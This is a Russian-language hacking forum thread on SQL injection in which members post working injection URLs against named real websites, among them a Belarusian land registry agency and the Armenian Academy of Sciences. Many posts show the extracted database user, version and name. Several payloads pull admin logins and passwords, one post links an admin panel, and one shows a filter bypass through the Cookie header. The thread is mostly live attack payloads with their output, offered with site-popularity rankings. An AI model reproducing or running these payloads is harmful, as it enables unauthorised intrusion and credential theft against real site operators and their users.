SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    914
    Reputations:
    363
    Code:
    http://www.murmancity.com/news/sel_news_from_id.php?id=8128+or+1+group+by+concat('xaker',floor(rand(0)*2))+having+min(0)+or+1+--+
     
    _________________________
    1 person likes this.
  2. Ro Man

    Ro Man Elder - Старейшина

    Joined:
    4 Jun 2007
    Messages:
    30
    Likes Received:
    16
    Reputations:
    0
    для любителей NY :D
    PR 5
    PHP:
    http://www.creativecoreny.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat%28username,0x3a,password%29chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
     
    1 person likes this.
  3. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Сайт Брестского агентства по государственной регистрации и земельному кадастру.

    ТИЦ = 20
    PR = 3

    Code:
    http://agr.brest.by/agencies/?id=-3'+union+all+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12+--+
     
    1 person likes this.
  4. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    тИЦ 425
    Code:
    http://promlitie.ru/index.php?r=9&vmonth=2012-03&nid=99999999999+UnIon+selECt+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3+--+
    promlit6_user@localhost:promlit6_data:5.0.92-log
     
  5. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Мега - Боян, который валяется в гугле около года :)
    Так что скуля не в зачет!
     
    3 people like this.
  6. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    m-game.com.ua
    Code:
    http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+and+''='select' true //вырезается select
    http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+and+''='selselectect' false //но не рекурсивно!
    http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+and+'test'='(test)' true //вырезаются скобки
    http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+--+а false //так как комментирование не работает, и под фильтр не попадает, можно сразу сказать что условие заключено в скобки.
    
    В общем - выхода нет. Но как оказалось - руки кодерам лучше было бы оборвать. Под фильтр попадают только массивы _GET и _POST, а массив _COOKIE не проверяется.

    Code:
    GET /?podr=compare&patch=catalog HTTP/1.1
    Host: m-game.com.ua
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Cookie: version_ids=298) union select 1,user(),version(),4,5,6,7-- f; 
    
    Code:
    user:mgame@localhost version:5.0.77
    
     
    1 person likes this.
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    914
    Reputations:
    363
    Code:
    http://www.gipsstyle.ru/price.php?cat_id=3+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1+--+
     
    _________________________
  8. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Оффициальный сайт группы "Старый приятель".

    ТИЦ = 30
    PR = 2

    PHP:
    http://www.star-priyatel.ru/events.php?mode=show&id=9999999+union+select+1,2,3,concat_ws(0x3a,f_id,f_login,f_password),4,5+from+t_admins+limit+1,1--
     
    2 people like this.
  9. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    http://www.game-leshiy.ru/porno_games.php?id=-10'+union+select+1,2,3,4,5,6,7,8,9,10+--+
     
  10. immortalist

    immortalist Member

    Joined:
    16 Jan 2010
    Messages:
    99
    Likes Received:
    64
    Reputations:
    37
    ТиЦ 550, PR 4, ЯК, DMOZ, YI 75k, GI 107k
    http://www.globalomsk.ru/directory/index.php?category=1 UNION SELECT NULL,NULL,CONCAT_WS(0x3a,user(),version(),database()),NULL,NULL#​
     
    1 person likes this.
  11. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Code:
    ]http://www.bodyshape.co.th/inthemedia.php?cat=[COLOR=Red][B]-[/B][/COLOR]1[COLOR=Red][B]+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16--+[/B][/COLOR]
    version: 5.0.51a
    database: bodyshape_db
    user: bodyshape_admin@localhost
    Code:
    http://www.mazda.autoland-mgn.ru/index.php?id=[COLOR=Red][B]-[/B][/COLOR]18[COLOR=Red][B]+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--+[/B][/COLOR]
    version: 5.0.41-log
    database: mgnauto_bs
    user: [email protected]
     
    1 person likes this.
  12. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Облицовочная плитка никому не нужна?

    ТИЦ = 210
    PR = 3

    Яндекс Каталог = Y
    DMOZ.org = Y

    PHP:
    http://www.akvabeton.ru/catalog.php?menu=ncat&part=9999999'+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9+--+
    Вывод в сорце:

    PHP:
    geeload_akvabeto@localhost:geeload_akvabeto:4.1.13
     
  13. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Эскорт:
    Code:
    http://www.escortscitytours.com/index.php?escortid=-320'+union(select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema./**/columns+where+table_name+like+'members'+limit+1,1)--+f
     
    2 people like this.
  14. m0m

    m0m Banned

    Joined:
    4 Mar 2012
    Messages:
    85
    Likes Received:
    20
    Reputations:
    0
    /mnt/cluster/data/
     
    1 person likes this.
  15. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Поднимаем уровень рождаемости :)

    PHP:
    http://donor-spermi.ru/contact.php?id=1+union+select+1,concat_ws(0x3a,user,pass),3,4,5,6,7,8,9+from+userlist--
    Вывод в <title>, админка http://donor-spermi.ru/admin/
     
    1 person likes this.
  16. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Национальная академия наук Республики Армения
    тИЦ 500 PR 7
    Code:
    http://www.sci.am/viewnews.php?t=0&langid=1&nid=-1%27+UnIon+selECt+1,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+
    scinew@localhost:scinew_unicode:5.1.61-0ubuntu0.11.10.1
    Code:
    http://www.sci.am/viewnews.php?t=0&langid=1&nid=-1%27+UnIon+selECt+1,2,group_concat%28email%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+inst+--+
    Пароли от админки и почты скорее всего в другой базе... :(
     
    1 person likes this.
  17. m0m

    m0m Banned

    Joined:
    4 Mar 2012
    Messages:
    85
    Likes Received:
    20
    Reputations:
    0
    soldat1945@localhost:BelMusic
    [email protected]
     
    #14677 m0m, 15 Mar 2012
    Last edited: 15 Mar 2012
    2 people like this.
  18. life:)

    life:) Banned

    Joined:
    9 Sep 2010
    Messages:
    98
    Likes Received:
    18
    Reputations:
    8
    !!!!!!!!!!!!!!!

    Интернет Магазин
    Яндекс тИЦ (CY) 550
    Alexa Rank 1,152,314 +454,752
    Google PageRank (PR) 4
    от лайфа=)
     
    1 person likes this.
  19. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Круто, только баян.
     
    1 person likes this.
  20. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    minsoc.ru ТИЦ-450 PR-5 минералоголики:)
    Code:
    http://www.minsoc.ru/memberslist.php?uid=3035-999.9+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,concat_ws(0x3a,version(),user(),database()),86,87,88,89,90,91,92,93,94,95,96+--+
    Code:
    5.0.26-log:minsocru@localhost:minsocru
    real-business.ru ТИЦ-160
    Code:
    http://www.real-business.ru/subpage.php?news=-1524+union+select+concat_ws(0x3a,version(),user(),database()),2+--+
    *в тайтле
    Code:
    5.0.70-log:[email protected]:gb_realbiz
    economics.kiev.ua ТИЦ-210
    Code:
    http://www.economics.kiev.ua/index.php?id=-938'+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,0,11,12+--+&view=article
    Code:
    5.1.49-3:c101@localhost:c101
     
    5 people like this.
Thread Status:
Not open for further replies.